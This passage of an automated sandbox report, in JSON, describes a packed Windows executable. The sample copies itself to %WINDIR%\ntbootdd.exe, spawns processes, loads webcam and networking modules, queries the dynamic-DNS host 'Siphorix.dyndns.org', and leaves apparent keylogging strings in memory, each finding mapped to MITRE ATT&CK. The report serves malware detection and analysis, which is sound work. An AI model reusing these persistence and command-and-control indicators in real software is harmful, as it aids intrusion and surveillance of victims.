\"2500260078523e72@KERNELBASE.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"CreateProcessA\" with parameter \"-bs\" - (UID: 00000000-00006128)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" loaded module \"IMM32.DLL\" at base 76200000\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" loaded module \"AVICAP32.DLL\" at base 6bd00000\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" loaded module \"IPHLPAPI.DLL\" at base 73fb0000\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76580000\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" loaded module \"ADVPACK\" at base 6bca0000\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" loaded module \"ADVAPI32.DLL\" at base 779e0000\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" loaded module \"SHELL32.DLL\" at base 76660000\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" loaded module \"PROPSYS.DLL\" at base 74980000\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" loaded module \"OLE32.DLL\" at base 772b0000\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75b00000\n \"ntbootdd.exe\" loaded module \"IPHLPAPI.DLL\" at base 73fb0000\n \"ntbootdd.exe\" loaded module \"SHELL32.DLL\" at base 76660000\n \"ntbootdd.exe\" loaded module \"ADVAPI32.DLL\" at base 779e0000\n \"ntbootdd.exe\" loaded module \"PROPSYS.DLL\" at base 74980000\n \"ntbootdd.exe\" loaded module \"OLE32.DLL\" at base 772b0000\n \"ntbootdd.exe\" loaded module \"KERNEL32\" at base 76580000\n \"ntbootdd.exe\" loaded module \"ADVAPI32\" at base 779e0000\n \"ntbootdd.exe\" loaded module \"USER32\" at base 77c80000\n \"ntbootdd.exe\" loaded module \"SHELL32\" at base 76660000\n \"ntbootdd.exe\" loaded module \"AVICAP32\" at base 6bd00000\n \"ntbootdd.exe\" loaded module \"WS2_32\" at base 77f50000\n \"ntbootdd.exe\" loaded module \"IMAGEHLP\" at base 75f90000\n \"ntbootdd.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76580000\n \"ntbootdd.exe\" loaded module \"ADVPACK\" at base 6bca0000\n \"ntbootdd.exe\" loaded module \"AVICAP32.DLL\" at base 6bd00000\n \"ntbootdd.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 75620000\n \"ntbootdd.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 75180000\n \"ntbootdd.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NLAAPI.DLL\" at base 742e0000\n \"ntbootdd.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NAPINSP.DLL\" at base 73c40000\n \"ntbootdd.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77f30000\n \"ntbootdd.exe\" loaded module \"RPCRT4.DLL\" at base 77930000\n \"ntbootdd.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PNRPNSP.DLL\" at base 73c20000\n \"ntbootdd.exe\" loaded module \"DNSAPI.DLL\" at base 754e0000\n \"ntbootdd.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WINRNR.DLL\" at base 73c10000\n \"ntbootdd.exe\" loaded module \"WS2_32.DLL\" at base 77f50000\n \"ntbootdd.exe\" loaded module \"RASADHLP.DLL\" at base 723a0000\n \"ntbootdd.exe\" loaded module \"SSPICLI.DLL\" at base 75ae0000\n \"ntbootdd.exe\" loaded module \"%WINDIR%\\SYSTEM32\\DBGHELP.DLL\" at base 70160000\n \"ntbootdd.exe\" loaded module \"IMM32.DLL\" at base 76200000\n \"ntbootdd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71120000\n \"ntbootdd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"ntbootdd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"ntbootdd.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bdc0000\n \"ntbootdd.exe\" loaded module \"AVICAP32.DLL\" at base 6d590000\n \"ntbootdd.exe\" loaded module \"AVICAP32\" at base 6d590000\n \"ntbootdd.exe\" loaded module \"ADVPACK\" at base 6c300000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"ntbootdd.exe\" called \"CreateDirectoryA\" with parameter %WINDIR%\\Logs\\%OSUSER% (UID: 00000000-00005888)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"LoadLibrary\" with a parameter imm32.dll (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"LoadLibrary\" with a parameter avicap32.dll (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"LoadLibrary\" with a parameter iphlpapi.dll (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"LoadLibrary\" with a parameter advpack (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00006128)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter iphlpapi.dll (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter advapi32 (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter shell32 (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter avicap32 (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter ws2_32 (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter imagehlp (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter advpack (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter avicap32.dll (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\dbghelp.dll (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter imm32.dll (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter avicap32.dll (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter iphlpapi.dll (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter advapi32 (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter shell32 (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter avicap32 (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter ws2_32 (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter imagehlp (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter advpack (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\dbghelp.dll (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003788)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003788)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003788)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003788)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003788)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter advapi32 (UID: 00000000-00003788)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00003788)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter shell32 (UID: 00000000-00003788)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter avicap32 (UID: 00000000-00003788)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter ws2_32 (UID: 00000000-00003788)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter imagehlp (UID: 00000000-00003788)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003788)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter advpack (UID: 00000000-00003788)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00003788)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00004420)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"Siphorix.dyndns.org\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77930000\n \"ntbootdd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77930000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"ntbootdd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"ntbootdd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360\" has an writable section named \"UPX0\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360\" has an writable section named \"UPX1\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360\" has an writable section named \".rsrc\"\n \"ntbootdd.exe.bin\" has an writable section named \"UPX0\"\n \"ntbootdd.exe.bin\" has an writable section named \"UPX1\"\n \"ntbootdd.exe.bin\" has an writable section named \".rsrc\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360\" has an executable section named \"UPX0\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360\" has an executable section named \"UPX1\"\n \"ntbootdd.exe.bin\" has an executable section named \"UPX0\"\n \"ntbootdd.exe.bin\" has an executable section named \"UPX1\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-70", "type": 6, "relevance": 10, "name": "Scanning for window names", "description": "\"ntbootdd.exe\" searching for class \"Shell_TrayWnd\"", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"ntbootdd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"ntbootdd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"ntbootdd.exe\" with commandline \"-bs\" (UID: 00000000-00005888)\n Spawned process \"ntbootdd.exe\" (UID: 00000000-00003108)\n Spawned process \"ntbootdd.exe\" (UID: 00000000-00003788)\n Spawned process \"ntbootdd.exe\" (UID: 00000000-00004420)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"ntbootdd.exe\" with commandline \"-bs\" (UID: 00000000-00005888)\n Spawned process \"ntbootdd.exe\" (UID: 00000000-00003108)\n Spawned process \"ntbootdd.exe\" (UID: 00000000-00003788)\n Spawned process \"ntbootdd.exe\" (UID: 00000000-00004420)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"ntbootdd.exe\" (UID: 00000000-00003108) was launched with new environment variables: \"PROMPT=\"$P$G\"\"\n Process \"ntbootdd.exe\" (UID: 00000000-00003108) was launched with modified environment variables: \"PSModulePath, PATHEXT\"\n Process \"ntbootdd.exe\" (UID: 00000000-00003788) was launched with modified environment variables: \"PSModulePath, PATHEXT\"\n Process \"ntbootdd.exe\" (UID: 00000000-00003788) was launched with missing environment variables: \"PROMPT\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360\" was detected as \"UPX\" and name: \"Packer\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360\" was detected as \"Borland Delphi\" and name: \"Compiler\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360\" was detected as \"Turbo Linker\" and name: \"Linker\"\n \"ntbootdd.exe.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"ntbootdd.exe.bin\" was detected as \"Borland Delphi\" and name: \"Compiler\"\n \"ntbootdd.exe.bin\" was detected as \"Turbo Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"CopyFileA\" to copy C:\\208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe to new location %WINDIR%\\ntbootdd.exe (UID: 00000000-00006128)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\gADCzOaPvJ\"\n \"gADCzOaPvJ\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"ntbootdd.exe.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,mov\tecx, 0xf,push\t0,push\t0,dec\tecx,jne\t0x3002401c,push\tecx,push\tebx,push\tesi,mov\teax, 0x30023e2c,call\t0x300034b4,mov\tebx, dword ptr [0x30028e3c],xor\teax, eax,push\tebp,push\t0x30024699,push\tdword ptr fs:[eax],mov\tdword ptr fs:[eax], esp,call\t0x3001f0f0,test\tal, al,jne\t0x3002429e,call\t0x3001f530,call\t0x30022f8c,call\t0x3001eca4,mov\teax, dword ptr [ebx + 0x14],mov\tedx, 0x300246b0,call\t0x300027a8,jne\t0x3002409d,mov\teax, dword ptr [ebx + 0x24],call\t0x3000ce80,\"\n \"ntbootdd.exe.bin\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,mov\tecx, 0xf,push\t0,push\t0,dec\tecx,jne\t0x3002401c,push\tecx,push\tebx,push\tesi,mov\teax, 0x30023e2c,call\t0x300034b4,mov\tebx, dword ptr [0x30028e3c],xor\teax, eax,push\tebp,push\t0x30024699,push\tdword ptr fs:[eax],mov\tdword ptr fs:[eax], esp,call\t0x3001f0f0,test\tal, al,jne\t0x3002429e,call\t0x3001f530,call\t0x30022f8c,call\t0x3001eca4,mov\teax, dword ptr [ebx + 0x14],mov\tedx, 0x300246b0,call\t0x300027a8,jne\t0x3002409d,mov\teax, dword ptr [ebx + 0x24],call\t0x3000ce80,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-23", "type": 2, "relevance": 2, "name": "Detected known bank URL artifact", "description": "\"Bkhoan`qc{Z0/,/1,1/14/8-34-05\\{vvv-hmrs`fq`l-bnl.itrshmahdadqB`oshnm{Z0/,/1,1/14/8-34-05\\{IRhmfkdJdx{;rodbh`kjdx=ZDmsdq\\;.rodbh`kjdx=;rodbh`kjdx=ZDmsdq\\;.rodbh`kjdx=BBkhoan`qc{Z0/,/1,1/140/-07-38\\{vvv-xntstad-bnl.v`sbg>u<8aYjo6p08e/B`oshnm{Z0/,/1,1/140/-07-38\\{RhmfkdJdx{;rodbh`kjdx=Z@ks\\;.rodbh`kjdx=;rodbh`kjdx=ZS`a\\;.rodbh`kjdx=;rodbh`kjdx=ZS`a\\;.rodbh`kjdx=;rodbh`kjdx=ZS`a\\;.rodbh`kjdx=;rodbh`kjdx=ZS`a\\;.rodbh`kjdx=;rodbh`kjdx=ZS`a\\;.rodbh`kjdx=;rodbh`kjdx=ZS`a\\;.rodbh`kjdx=+B`oshnm{Z0/,/1,1/140/-08-/0\\{S`rjRvhsbghmf+B`oshnm{Z0/,/1,1/140/-34-18\\{S`rjRvhsbghmf\" (Source: 10-02-2025, Indicator: \"bnl.it\")\n \"/8-34-05\\{vvv-hmrs`fq`l-bnl.itrshmah\" (Source: 00000000-00005888.00000002.69901.002E0000.00000004.mdmp, Indicator: \"bnl.it\")\n \"/8-34-05\\{vvv-hmrs`fq`l-bnl.itrshmahdadq\" (Source: 00000000-00005888.00000002.69901.002E0000.00000004.mdmp, 00000000-00005888.00000003.75264.002E0000.00000004.mdmp, Indicator: \"bnl.it\")", "origin": "File/Memory"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to touch file \"C:\\msacm32.dll\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to touch file \"C:\\Windows\\system32\\msacm32.dll\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to touch file \"C:\\WINMM.dll\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to touch file \"C:\\Windows\\system32\\WINMM.dll\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to touch file \"C:\\version.DLL\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to touch file \"C:\\wsock32.dll\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to touch file \"C:\\Windows\\system32\\wsock32.dll\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to touch file \"C:\\avicap32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to access non-existent file \"C:\\208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe.Local\\\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to access non-existent file \"C:\\208F2E064735793C173BDCBDBCA3A859A4AB1D46DE5333DCE9FC4F3ADECFF360.EXE.LOCAL\"\n \"ntbootdd.exe\" trying to access non-existent file \"C:\\Windows\\ntbootdd.exe.Local\\\"\n \"ntbootdd.exe\" trying to access non-existent file \"\\Device\\RasAcd\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": 